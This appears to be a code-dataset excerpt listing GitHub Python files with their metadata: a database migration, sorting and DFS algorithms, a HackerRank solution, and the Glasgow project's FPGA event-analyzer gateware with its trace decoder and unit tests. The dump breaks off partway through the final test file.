blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
561c07f563101185de123baff76553af01f9f150
|
d1e2f5993573a16ed6cf359215e596814db33ad7
|
/flaskm/db_respository/versions/003_migration.py
|
c26e106263a75f6e4f7112810b5f90ddb811e57f
|
[] |
no_license
|
Andor-Z/My-Learning-Note
|
a6b62fd10119cede9ba4c6c79b2dcb5c346d11e0
|
202401f1be1f9f7c32049623315c0c54720498f7
|
refs/heads/master
| 2022-10-22T13:55:44.821097 | 2016-07-10T09:21:02 | 2016-07-10T09:21:02 | 42,592,078 | 1 | 1 | null | 2022-10-20T21:49:08 | 2015-09-16T14:24:01 |
Python
|
UTF-8
|
Python
| false | false | 1,610 |
py
|
from sqlalchemy import *
from migrate import *
from migrate.changeset import schema
pre_meta = MetaData()
post_meta = MetaData()
alembic_version = Table('alembic_version', pre_meta,
Column('version_num', VARCHAR(length=32), nullable=False),
)
users = Table('users', post_meta,
Column('id', Integer, primary_key=True, nullable=False),
Column('name', String(length=64)),
Column('location', String(length=64)),
Column('about_me', Text),
Column('member_since', DateTime, default=ColumnDefault(<function ColumnDefault._maybe_wrap_callable.<locals>.<lambda> at 0x000000000347CAE8>)),
Column('last_seen', DateTime, default=ColumnDefault(<function ColumnDefault._maybe_wrap_callable.<locals>.<lambda> at 0x0000000004CDF268>)),
Column('email', String(length=64)),
Column('username', String(length=64)),
Column('role_id', Integer),
Column('password_hash', String(length=128)),
Column('confirmed', Boolean, default=ColumnDefault(False)),
Column('avatar_hash', String(length=32)),
)
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
pre_meta.bind = migrate_engine
post_meta.bind = migrate_engine
pre_meta.tables['alembic_version'].drop()
post_meta.tables['users'].columns['avatar_hash'].create()
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
pre_meta.bind = migrate_engine
post_meta.bind = migrate_engine
pre_meta.tables['alembic_version'].create()
post_meta.tables['users'].columns['avatar_hash'].drop()
|
[
"[email protected]"
] | |
61ca45d83eb6073d7855e1253f88d235326f2005
|
db7601406ea38e0b361d9a1c54ba640ae9b132eb
|
/quicksort.py
|
0463437079b854f611c9d76d6e9146e84805bc56
|
[] |
no_license
|
FalseF/Algorithms-and-Problem-Solving-with-Python
|
c06c049d7499df76795eac8b82d8f5aebe126109
|
d53ee80da5ff865eef05bbe280bdc68dae4f275d
|
refs/heads/master
| 2023-07-17T06:24:47.918286 | 2021-09-06T16:32:30 | 2021-09-06T16:32:30 | 403,690,848 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 518 |
py
|
cnt=0
def partition(A,low,high):
global cnt
pivot=A[high]
i=low-1
for j in range(low,high):
if(pivot>=A[j]):
i+=1
A[i],A[j]=A[j],A[i]
cnt+=1
A[i+1],A[high]=A[high],A[i+1]
cnt+=1
return i+1
def quick_sort(A,low,high):
if(low<high):
pivot=partition(A,low,high)
quick_sort(A,low,pivot-1)
quick_sort(A,pivot+1,high)
A=[10,5,4,1,8]
quick_sort(A,0,len(A)-1)
print(A)
print("Swapping time")
print(cnt)
|
[
"[email protected]"
] | |
d4fd9849fa05350b943d25108223405f5d1ff1e1
|
24946a607d5f6425f07d6def4968659c627e5324
|
/Python/any-or-all.py
|
4fbe2d7a06841045541ba086ab6a9fd5e9056ae0
|
[] |
no_license
|
mmrubayet/HackerRank_solutions
|
5d8acbb8fd6f305a006f147e6cb76dbfc71bbca5
|
f1c72fbf730b6a79656d578f6c40a128a6f0ac5c
|
refs/heads/master
| 2023-06-02T16:51:18.017902 | 2021-06-19T18:35:41 | 2021-06-19T18:35:41 | 233,853,287 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 109 |
py
|
n, ar = int(input()), input().split()
print(all([int(i)>0 for i in ar]) and any([j == j[::-1] for j in ar]))
|
[
"[email protected]"
] | |
b369d7adcb7c77b520a6603260a100ec030d48d3
|
57e778bf76e8857aeae96a997c9aa36d0744078b
|
/dfs/dfs_order.py
|
47237ae0ad98285b6bdaefa8da0906b8627a1eed
|
[] |
no_license
|
hieuza/algorithms
|
1f9da2a2f8bdc054fa2b9028da2ac3ad90eed29b
|
beac146b44551bda1a227aff0f2dda4dd1e555bb
|
refs/heads/master
| 2021-01-18T16:32:19.823463 | 2013-08-05T03:43:04 | 2013-08-05T03:43:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,598 |
py
|
#!/usr/bin/env python
# [email protected]
# 03.Dec.2012
# updated: 03.Aug.2012, iterative DFS
# depth-first-search ordering
# preorder, postorder and reversed postorder
from graph import Graph
import time
class DFSOrder(object):
def __init__(self, g, recursive=True):
self.g = g
self.recursive = recursive
# queues of visited vertices
self.preorder = []
self.postorder = []
visited = [False] * g.N
for u in xrange(self.g.N):
if not visited[u]:
if self.recursive:
self.dfs(u, visited)
else:
self.iterative_dfs(u, visited)
# stack of post visited vertices
self.reversed_postorder = self.postorder[:]
self.reversed_postorder.reverse()
def dfs(self, u, visited):
visited[u] = True
self.preorder.append(u)
for v in self.g.adjacency(u):
if not visited[v]:
self.dfs(v, visited)
self.postorder.append(u)
# dfs started from vertex u
def iterative_dfs(self, u, visited):
stack = [u]
visited[u] = True
self.preorder.append(u)
bNextStackElem = False
while len(stack) > 0: # stack is not empty
s = stack[-1] # peek the top of the stack
bNextStackElem = False
for v in self.g.adjacency(s):
if bNextStackElem:
break
if not visited[v]:
stack.append(v) # push to the top of stack
visited[v] = True
self.preorder.append(v)
# first time visit the node
# will process it in next while iterator
bNextStackElem = True
continue
if not bNextStackElem:
self.postorder.append(s)
stack.pop()
from graph import simple_graph
def test(n):
g = Graph(n, weighted=False, directed=True)
g.random_generate(max_degree=20)
# print g
# g = simple_graph()
p = []
for r in [True, False]:
try:
t0 = time.time()
dfsorder = DFSOrder(g, recursive=r)
except RuntimeError as e:
print 'RuntimeError:', e
continue
finally:
print 'running time:', ('%.5f' % (time.time() - t0))
if n < 20:
print ' preorder:', dfsorder.preorder
print ' postorder:', dfsorder.postorder
print 'rev-postorder:', dfsorder.reversed_postorder
p.append([dfsorder.preorder, dfsorder.postorder,\
dfsorder.reversed_postorder])
if len(p) == 1: # only iterative result
print 'Iterative running completed'
else:
# check if iterative and recursive results are the same
pre1, post1, rev1 = p[0]
pre2, post2, rev2 = p[1]
if (pre1 != pre2 or post1 != post2 or rev1 != rev2):
print "wrong iterative algorithm"
else:
print "OK for this test"
if __name__ == '__main__':
import sys
n = 5
if len(sys.argv) > 1:
n = int(sys.argv[1])
test(n)
|
[
"[email protected]"
] | |
b252813ec3a656ad05163967f29a6b1d6d3f5201
|
058a77c2a321671a183160fdc0ecfe46889d59ac
|
/Day17/merge_sort.py
|
27a121d677169440053453a5af60a2fc128e149b
|
[] |
no_license
|
MinJae-Gwon/Algo
|
502b919ca5a8bb8392cd284008f42693df7a01bb
|
23913f8e7495c931e59ea95b4bfa686818ede8e0
|
refs/heads/master
| 2021-07-17T05:55:16.243320 | 2020-06-27T13:11:49 | 2020-06-27T13:11:49 | 171,435,252 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 597 |
py
|
data = [38, 27, 43, 3, 9, 82, 10]
def merge(l, r):
result = []
while True:
if l[0] <= r[0]:
result.append(l.pop(0))
else:
result.append(r.pop(0))
if len(l) == 0 or len(r) == 0:
break
if len(l) > 0:
result.extend(l)
if len(r) > 0:
result.extend(r)
return result
def merge_sort(m):
if len(m) <= 1:
return m
mid = len(m) // 2
left = m[:mid]
right = m[mid:]
left = merge_sort(left)
right = merge_sort(right)
return merge(left, right)
print(merge_sort(data))
|
[
"[email protected]"
] | |
5918ac3617d6a5c640a6e0aca7193152daaf268f
|
b0a217700c563c4f057f2aebbde8faba4b1b26d2
|
/software/glasgow/gateware/analyzer.py
|
bb4a69bc6366646bbb3c9b40d54291e9a389cd88
|
[
"0BSD",
"Apache-2.0"
] |
permissive
|
kbeckmann/Glasgow
|
5d183865da4fb499099d4c17e878a76192b691e7
|
cd31e293cb99ee10a3e4a03ff26f6f124e512c64
|
refs/heads/master
| 2021-09-15T15:59:38.211633 | 2018-11-15T22:36:04 | 2018-11-22T21:13:59 | 157,077,707 | 3 | 0 |
NOASSERTION
| 2018-11-11T12:33:49 | 2018-11-11T12:33:48 | null |
UTF-8
|
Python
| false | false | 29,898 |
py
|
from functools import reduce
from collections import OrderedDict
from migen import *
from migen.fhdl.bitcontainer import log2_int
from migen.genlib.fifo import _FIFOInterface, SyncFIFOBuffered
from migen.genlib.coding import PriorityEncoder, PriorityDecoder
from migen.genlib.fsm import FSM
__all__ = ["EventSource", "EventAnalyzer", "TraceDecodingError", "TraceDecoder"]
REPORT_DELAY = 0b10000000
REPORT_DELAY_MASK = 0b10000000
REPORT_EVENT = 0b01000000
REPORT_EVENT_MASK = 0b11000000
REPORT_SPECIAL = 0b00000000
REPORT_SPECIAL_MASK = 0b11000000
SPECIAL_DONE = 0b000000
SPECIAL_OVERRUN = 0b000001
SPECIAL_THROTTLE = 0b000010
SPECIAL_DETHROTTLE = 0b000011
class EventSource(Module):
def __init__(self, name, kind, width, fields, depth):
assert (width > 0 and kind in ("change", "strobe") or
width == 0 and kind == "strobe")
self.name = name
self.width = width
self.fields = fields
self.depth = depth
self.kind = kind
self.data = Signal(max(1, width))
self.trigger = Signal()
class EventAnalyzer(Module):
"""
An event analyzer module.
This event analyzer is designed to observe parallel, bursty processes in real-time, and yet
degrade gracefully (i.e. without losing data or breaking most applets) when observing processes
that generate events continuously, or generate very many simultaneous events for a short time.
To do this, the event analyzer is permitted to pause any applets marked as purely synchronous
once the event FIFO high-water mark is reached.
The event analyzer tries to make efficient use of power-of-2 wide block RAMs and be highly
tunable. To achieve this, it separates the event FIFO from the event data FIFOs, and does not
storing timestamps explicitly. In a system with `n` events, each of which carries `d_n` bits
of data, there would be a single event FIFO that is `n` bits wide, where a bit being set means
that event `n` occurred at a given cycle; `n` event data FIFOs that are `d_n` bits wide each,
where, if a bit is set in the event FIFO, a data word is pushed into the event data FIFO; and
finally, one delay FIFO, where the last entry is incremented on every cycle that has
no event, and a new entry is pushed on every cycle there is at least one event. This way,
only cycles that have at least one event add new FIFO entries, and only one wide timestamp
counter needs to be maintained, greatly reducing the amount of necessary resources compared
to a more naive approach.
"""
@staticmethod
def _depth_for_width(width):
if width == 0:
return 0
elif width <= 2:
return 2048
elif width <= 4:
return 1024
elif width <= 8:
return 512
else:
return 256
def __init__(self, output_fifo, event_depth=None, delay_width=16):
assert output_fifo.width == 8
self.output_fifo = output_fifo
self.delay_width = delay_width
self.event_depth = event_depth
self.event_sources = Array()
self.done = Signal()
self.throttle = Signal()
self.overrun = Signal()
def add_event_source(self, name, kind, width, fields=(), depth=None):
if depth is None:
depth = self._depth_for_width(width)
event_source = EventSource(name, kind, width, fields, depth)
self.event_sources.append(event_source)
return event_source
def do_finalize(self):
assert len(self.event_sources) < 2 ** 6
assert max(s.width for s in self.event_sources) <= 32
# Fill the event, event data, and delay FIFOs.
throttle_on = Signal()
throttle_off = Signal()
throttle_edge = Signal()
throttle_fifos = []
self.sync += [
If(~self.throttle & throttle_on,
self.throttle.eq(1),
throttle_edge.eq(1)
).Elif(self.throttle & throttle_off,
self.throttle.eq(0),
throttle_edge.eq(1)
).Else(
throttle_edge.eq(0)
)
]
overrun_trip = Signal()
overrun_fifos = []
self.sync += [
If(overrun_trip,
self.overrun.eq(1)
)
]
event_width = 1 + len(self.event_sources)
if self.event_depth is None:
event_depth = min(self._depth_for_width(event_width),
self._depth_for_width(self.delay_width))
else:
event_depth = self.event_depth
self.submodules.event_fifo = event_fifo = \
SyncFIFOBuffered(width=event_width, depth=event_depth)
throttle_fifos.append(self.event_fifo)
self.comb += [
event_fifo.din.eq(Cat(self.throttle, [s.trigger for s in self.event_sources])),
event_fifo.we.eq(reduce(lambda a, b: a | b, (s.trigger for s in self.event_sources)) |
throttle_edge)
]
self.submodules.delay_fifo = delay_fifo = \
SyncFIFOBuffered(width=self.delay_width, depth=event_depth)
delay_timer = self._delay_timer = Signal(self.delay_width)
delay_ovrun = ((1 << self.delay_width) - 1)
delay_max = delay_ovrun - 1
self.sync += [
If(delay_fifo.we,
delay_timer.eq(0)
).Else(
delay_timer.eq(delay_timer + 1)
)
]
self.comb += [
delay_fifo.din.eq(Mux(self.overrun, delay_ovrun, delay_timer)),
delay_fifo.we.eq(event_fifo.we | (delay_timer == delay_max) |
self.done | self.overrun),
]
for event_source in self.event_sources:
if event_source.width > 0:
event_source.submodules.data_fifo = event_data_fifo = \
SyncFIFOBuffered(event_source.width, event_source.depth)
self.submodules += event_source
throttle_fifos.append(event_data_fifo)
self.comb += [
event_data_fifo.din.eq(event_source.data),
event_data_fifo.we.eq(event_source.trigger),
]
else:
event_source.submodules.data_fifo = _FIFOInterface(1, 0)
# Throttle applets based on FIFO levels with hysteresis.
self.comb += [
throttle_on .eq(reduce(lambda a, b: a | b,
(f.fifo.level >= f.depth - f.depth // (4 if f.depth > 4 else 2)
for f in throttle_fifos))),
throttle_off.eq(reduce(lambda a, b: a & b,
(f.fifo.level < f.depth // (4 if f.depth > 4 else 2)
for f in throttle_fifos))),
]
# Detect imminent FIFO overrun and trip overrun indication.
self.comb += [
overrun_trip.eq(reduce(lambda a, b: a | b,
(f.fifo.level == f.depth - 2
for f in throttle_fifos)))
]
# Dequeue events, and serialize events and event data.
self.submodules.event_encoder = event_encoder = \
PriorityEncoder(width=len(self.event_sources))
self.submodules.event_decoder = event_decoder = \
PriorityDecoder(width=len(self.event_sources))
self.comb += event_decoder.i.eq(event_encoder.o)
self.submodules.serializer = serializer = FSM(reset_state="WAIT-EVENT")
rep_overrun = Signal()
rep_throttle_new = Signal()
rep_throttle_cur = Signal()
delay_septets = 5
delay_counter = Signal(7 * delay_septets)
serializer.act("WAIT-EVENT",
If(delay_fifo.readable,
delay_fifo.re.eq(1),
NextValue(delay_counter, delay_counter + delay_fifo.dout + 1),
If(delay_fifo.dout == delay_ovrun,
NextValue(rep_overrun, 1),
NextState("REPORT-DELAY")
)
),
If(event_fifo.readable,
event_fifo.re.eq(1),
NextValue(event_encoder.i, event_fifo.dout[1:]),
NextValue(rep_throttle_new, event_fifo.dout[0]),
If((event_fifo.dout != 0) | (rep_throttle_cur != event_fifo.dout[0]),
NextState("REPORT-DELAY")
)
).Elif(self.done,
NextState("REPORT-DELAY")
)
)
serializer.act("REPORT-DELAY",
If(delay_counter >= 128 ** 4,
NextState("REPORT-DELAY-5")
).Elif(delay_counter >= 128 ** 3,
NextState("REPORT-DELAY-4")
).Elif(delay_counter >= 128 ** 2,
NextState("REPORT-DELAY-3")
).Elif(delay_counter >= 128 ** 1,
NextState("REPORT-DELAY-2")
).Else(
NextState("REPORT-DELAY-1")
)
)
for septet_no in range(delay_septets, 0, -1):
if septet_no == 1:
next_state = [
NextValue(delay_counter, 0),
If(rep_overrun,
NextState("REPORT-OVERRUN")
).Elif(rep_throttle_cur != rep_throttle_new,
NextState("REPORT-THROTTLE")
).Elif(event_encoder.i,
NextState("REPORT-EVENT")
).Elif(self.done,
NextState("REPORT-DONE")
).Else(
NextState("WAIT-EVENT")
)
]
else:
next_state = [
NextState("REPORT-DELAY-%d" % (septet_no - 1))
]
serializer.act("REPORT-DELAY-%d" % septet_no,
If(self.output_fifo.writable,
self.output_fifo.din.eq(
REPORT_DELAY | delay_counter.part((septet_no - 1) * 7, 7)),
self.output_fifo.we.eq(1),
*next_state
)
)
serializer.act("REPORT-THROTTLE",
If(self.output_fifo.writable,
NextValue(rep_throttle_cur, rep_throttle_new),
If(rep_throttle_new,
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_THROTTLE),
).Else(
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_DETHROTTLE),
),
self.output_fifo.we.eq(1),
If(event_encoder.n,
NextState("WAIT-EVENT")
).Else(
NextState("REPORT-EVENT")
)
)
)
event_source = self.event_sources[event_encoder.o]
event_data = Signal(32)
serializer.act("REPORT-EVENT",
If(self.output_fifo.writable,
NextValue(event_encoder.i, event_encoder.i & ~event_decoder.o),
self.output_fifo.din.eq(
REPORT_EVENT | event_encoder.o),
self.output_fifo.we.eq(1),
NextValue(event_data, event_source.data_fifo.dout),
event_source.data_fifo.re.eq(1),
If(event_source.width > 24,
NextState("REPORT-EVENT-DATA-4")
).Elif(event_source.width > 16,
NextState("REPORT-EVENT-DATA-3")
).Elif(event_source.width > 8,
NextState("REPORT-EVENT-DATA-2")
).Elif(event_source.width > 0,
NextState("REPORT-EVENT-DATA-1")
).Else(
If(event_encoder.i & ~event_decoder.o,
NextState("REPORT-EVENT")
).Else(
NextState("WAIT-EVENT")
)
)
)
)
for octet_no in range(4, 0, -1):
if octet_no == 1:
next_state = [
If(event_encoder.n,
NextState("WAIT-EVENT")
).Else(
NextState("REPORT-EVENT")
)
]
else:
next_state = [
NextState("REPORT-EVENT-DATA-%d" % (octet_no - 1))
]
serializer.act("REPORT-EVENT-DATA-%d" % octet_no,
If(self.output_fifo.writable,
self.output_fifo.din.eq(event_data.part((octet_no - 1) * 8, 8)),
self.output_fifo.we.eq(1),
*next_state
)
)
serializer.act("REPORT-DONE",
If(self.output_fifo.writable,
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_DONE),
self.output_fifo.we.eq(1),
NextState("DONE")
)
)
serializer.act("DONE",
If(~self.done,
NextState("WAIT-EVENT")
)
)
serializer.act("REPORT-OVERRUN",
If(self.output_fifo.writable,
self.output_fifo.din.eq(REPORT_SPECIAL | SPECIAL_OVERRUN),
self.output_fifo.we.eq(1),
NextState("OVERRUN")
)
)
serializer.act("OVERRUN",
NextState("OVERRUN")
)
class TraceDecodingError(Exception):
pass
class TraceDecoder:
"""
Event analyzer trace decoder.
Decodes raw analyzer traces into a timestamped sequence of maps from event fields to
their values.
"""
def __init__(self, event_sources, absolute_timestamps=True):
self.event_sources = event_sources
self.absolute_timestamps = absolute_timestamps
self._state = "IDLE"
self._byte_off = 0
self._timestamp = 0
self._delay = 0
self._event_src = 0
self._event_off = 0
self._event_data = 0
self._pending = OrderedDict()
self._timeline = []
def events(self):
"""
Return names and widths for all events that may be emitted by this trace decoder.
"""
yield ("throttle", "throttle", 1)
for event_src in self.event_sources:
if event_src.fields:
for field_name, field_width in event_src.fields:
yield ("%s-%s" % (field_name, event_src.name), event_src.kind, field_width)
else:
yield (event_src.name, event_src.kind, event_src.width)
def _flush_timestamp(self):
if self._delay == 0:
return
if self._pending:
self._timeline.append((self._timestamp, self._pending))
self._pending = OrderedDict()
if self.absolute_timestamps:
self._timestamp += self._delay
else:
self._timestamp = self._delay
self._delay = 0
def process(self, data):
"""
Incrementally parse a chunk of analyzer trace, and record events in it.
"""
for octet in data:
is_delay = ((octet & REPORT_DELAY_MASK) == REPORT_DELAY)
is_event = ((octet & REPORT_EVENT_MASK) == REPORT_EVENT)
is_special = ((octet & REPORT_SPECIAL_MASK) == REPORT_SPECIAL)
special = octet & ~REPORT_SPECIAL
if self._state == "IDLE" and is_delay:
self._state = "DELAY"
self._delay = octet & ~REPORT_DELAY_MASK
elif self._state == "DELAY" and is_delay:
self._delay = (self._delay << 7) | (octet & ~REPORT_DELAY_MASK)
elif self._state == "DELAY" and is_special and \
special in (SPECIAL_THROTTLE, SPECIAL_DETHROTTLE):
self._flush_timestamp()
if special == SPECIAL_THROTTLE:
self._pending["throttle"] = 1
elif special == SPECIAL_DETHROTTLE:
self._pending["throttle"] = 0
elif self._state in ("IDLE", "DELAY") and is_event:
self._flush_timestamp()
if (octet & ~REPORT_EVENT_MASK) > len(self.event_sources):
raise TraceDecodingError("at byte offset %d: event source out of bounds" %
self._byte_off)
self._event_src = self.event_sources[octet & ~REPORT_EVENT_MASK]
if self._event_src.width == 0:
self._pending[self._event_src.name] = None
self._state = "IDLE"
else:
self._event_off = self._event_src.width
self._event_data = 0
self._state = "EVENT"
elif self._state == "EVENT":
self._event_data <<= 8
self._event_data |= octet
if self._event_off > 8:
self._event_off -= 8
else:
if self._event_src.fields:
offset = 0
for field_name, field_width in self._event_src.fields:
self._pending["%s-%s" % (field_name, self._event_src.name)] = \
(self._event_data >> offset) & ((1 << field_width) - 1)
offset += field_width
else:
self._pending[self._event_src.name] = self._event_data
self._state = "IDLE"
elif self._state in "DELAY" and is_special and \
special in (SPECIAL_DONE, SPECIAL_OVERRUN):
self._flush_timestamp()
if special == SPECIAL_DONE:
self._state = "DONE"
elif special == SPECIAL_OVERRUN:
self._state = "OVERRUN"
else:
raise TraceDecodingError("at byte offset %d: invalid byte %#04x for state %s" %
(self._byte_off, octet, self._state))
self._byte_off += 1
def flush(self, pending=False):
"""
Return the complete event timeline since the start of decoding or the previous flush.
If ``pending`` is ``True``, also flushes pending events; this may cause duplicate
timestamps if more events arrive after the flush.
"""
if self._state == "OVERRUN":
self._timeline.append((self._timestamp, "overrun"))
elif pending and self._pending or self._state == "DONE":
self._timeline.append((self._timestamp, self._pending))
self._pending = OrderedDict()
timeline, self._timeline = self._timeline, []
return timeline
def is_done(self):
return self._state in ("DONE", "OVERRUN")
# -------------------------------------------------------------------------------------------------
import unittest
from migen.fhdl import verilog
from . import simulation_test
class EventAnalyzerTestbench(Module):
def __init__(self, **kwargs):
self.submodules.fifo = SyncFIFOBuffered(width=8, depth=64)
self.submodules.dut = EventAnalyzer(self.fifo, **kwargs)
def trigger(self, index, data):
yield self.dut.event_sources[index].trigger.eq(1)
yield self.dut.event_sources[index].data.eq(data)
def step(self):
yield
for event_source in self.dut.event_sources:
yield event_source.trigger.eq(0)
def read(self, count, limit=128):
data = []
cycle = 0
while len(data) < count:
while not (yield self.fifo.readable) and cycle < limit:
yield
cycle += 1
if not (yield self.fifo.readable):
raise ValueError("FIFO underflow")
data.append((yield from self.fifo.read()))
cycle = 16
while not (yield self.fifo.readable) and cycle < limit:
yield
cycle += 1
if (yield self.fifo.readable):
raise ValueError("junk in FIFO: %#04x at %d" % ((yield self.fifo.dout), count))
return data
class EventAnalyzerTestCase(unittest.TestCase):
def setUp(self):
self.tb = EventAnalyzerTestbench(event_depth=16)
def configure(self, tb, sources):
for n, args in enumerate(sources):
if not isinstance(args, tuple):
args = (args,)
tb.dut.add_event_source(str(n), "strobe", *args)
def assertEmitted(self, tb, data, decoded, flush_pending=True):
self.assertEqual((yield from tb.read(len(data))), data)
decoder = TraceDecoder(self.tb.dut.event_sources)
decoder.process(data)
self.assertEqual(decoder.flush(flush_pending), decoded)
@simulation_test(sources=(8,))
def test_one_8bit_src(self, tb):
yield from tb.trigger(0, 0xaa)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xaa,
], [
(2, {"0": 0xaa}),
])
@simulation_test(sources=(8,8))
def test_two_8bit_src(self, tb):
yield from tb.trigger(0, 0xaa)
yield from tb.trigger(1, 0xbb)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xaa,
REPORT_EVENT|1, 0xbb,
], [
(2, {"0": 0xaa, "1": 0xbb}),
])
@simulation_test(sources=(12,))
def test_one_12bit_src(self, tb):
yield from tb.trigger(0, 0xabc)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0x0a, 0xbc,
], [
(2, {"0": 0xabc}),
])
@simulation_test(sources=(16,))
def test_one_16bit_src(self, tb):
yield from tb.trigger(0, 0xabcd)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xab, 0xcd,
], [
(2, {"0": 0xabcd}),
])
@simulation_test(sources=(24,))
def test_one_24bit_src(self, tb):
yield from tb.trigger(0, 0xabcdef)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xab, 0xcd, 0xef
], [
(2, {"0": 0xabcdef}),
])
@simulation_test(sources=(32,))
def test_one_32bit_src(self, tb):
yield from tb.trigger(0, 0xabcdef12)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xab, 0xcd, 0xef, 0x12
], [
(2, {"0": 0xabcdef12}),
])
@simulation_test(sources=(0,))
def test_one_0bit_src(self, tb):
yield from tb.trigger(0, 0)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0,
], [
(2, {"0": None}),
])
@simulation_test(sources=(0,0))
def test_two_0bit_src(self, tb):
yield from tb.trigger(0, 0)
yield from tb.trigger(1, 0)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0,
REPORT_EVENT|1,
], [
(2, {"0": None, "1": None}),
])
@simulation_test(sources=(0,1))
def test_0bit_1bit_src(self, tb):
yield from tb.trigger(0, 0)
yield from tb.trigger(1, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0,
REPORT_EVENT|1, 0b1
], [
(2, {"0": None, "1": 0b1}),
])
@simulation_test(sources=(1,0))
def test_1bit_0bit_src(self, tb):
yield from tb.trigger(0, 1)
yield from tb.trigger(1, 0)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0b1,
REPORT_EVENT|1,
], [
(2, {"0": 0b1, "1": None}),
])
@simulation_test(sources=((3, (("a", 1), ("b", 2))),))
def test_fields(self, tb):
yield from tb.trigger(0, 0b101)
yield from tb.step()
yield from tb.trigger(0, 0b110)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0b101,
REPORT_DELAY|1,
REPORT_EVENT|0, 0b110,
], [
(2, {"a-0": 0b1, "b-0": 0b10}),
(3, {"a-0": 0b0, "b-0": 0b11}),
])
@simulation_test(sources=(8,))
def test_delay(self, tb):
yield
yield
yield from tb.trigger(0, 0xaa)
yield from tb.step()
yield
yield from tb.trigger(0, 0xbb)
yield from tb.step()
yield
yield
yield from self.assertEmitted(tb, [
REPORT_DELAY|4,
REPORT_EVENT|0, 0xaa,
REPORT_DELAY|2,
REPORT_EVENT|0, 0xbb,
], [
(4, {"0": 0xaa}),
(6, {"0": 0xbb}),
])
@simulation_test(sources=(1,))
def test_delay_2_septet(self, tb):
yield tb.dut._delay_timer.eq(0b1_1110000)
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000001,
REPORT_DELAY|0b1110001,
REPORT_EVENT|0, 0b1
], [
(0b1_1110001, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_3_septet(self, tb):
yield tb.dut._delay_timer.eq(0b01_0011000_1100011)
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000001,
REPORT_DELAY|0b0011000,
REPORT_DELAY|0b1100100,
REPORT_EVENT|0, 0b1
], [
(0b01_0011000_1100100, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_max(self, tb):
yield tb.dut._delay_timer.eq(0xfffe)
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000011,
REPORT_DELAY|0b1111111,
REPORT_DELAY|0b1111111,
REPORT_EVENT|0, 0b1
], [
(0xffff, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_overflow(self, tb):
yield tb.dut._delay_timer.eq(0xfffe)
yield
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000100,
REPORT_DELAY|0b0000000,
REPORT_DELAY|0b0000000,
REPORT_EVENT|0, 0b1
], [
(0x10000, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_overflow_p1(self, tb):
yield tb.dut._delay_timer.eq(0xfffe)
yield
yield
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000100,
REPORT_DELAY|0b0000000,
REPORT_DELAY|0b0000001,
REPORT_EVENT|0, 0b1
], [
(0x10001, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_4_septet(self, tb):
for _ in range(64):
yield tb.dut._delay_timer.eq(0xfffe)
yield
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000001,
REPORT_DELAY|0b1111111,
REPORT_DELAY|0b1111111,
REPORT_DELAY|0b1000001,
REPORT_EVENT|0, 0b1
], [
(0xffff * 64 + 1, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_done(self, tb):
yield from tb.trigger(0, 1)
yield from tb.step()
yield
yield tb.dut.done.eq(1)
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0b1,
